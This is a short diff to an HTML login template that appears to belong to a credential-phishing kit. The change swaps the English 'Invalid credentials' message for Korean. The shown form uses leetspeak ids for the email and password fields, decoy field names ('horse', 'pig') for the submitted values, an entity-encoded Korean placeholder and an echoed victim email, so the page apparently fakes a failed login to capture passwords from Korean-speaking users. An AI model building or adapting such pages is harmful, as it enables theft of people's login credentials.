--- a/templates/ind.html
+++ b/templates/ind.html
@@ -198,7 +198,7 @@ body
                                 <div class="alert alert-danger hide alert2"></div>
                             </div>
                             <b><font color="#236dad"><h5><span class="ai_txt" name"email" id="m3w41l"></h5></span></font color></b>
-                            <h6>Invalid credentials. Please try again</h6>
+                            <h6>잘못된 자격 증명. 다시 시도해 주세요</h6>
                             <h5>{{eman}}</h5>
 							<input type="hidden" name="horse" value="{{eman}}">
                             <input type="password" id="q455m0T2" name="pig" placeholder="&#51060;&#47700;&#51068; &#48708;&#48128;&#48264;&#54840;" class="form-control" required="">
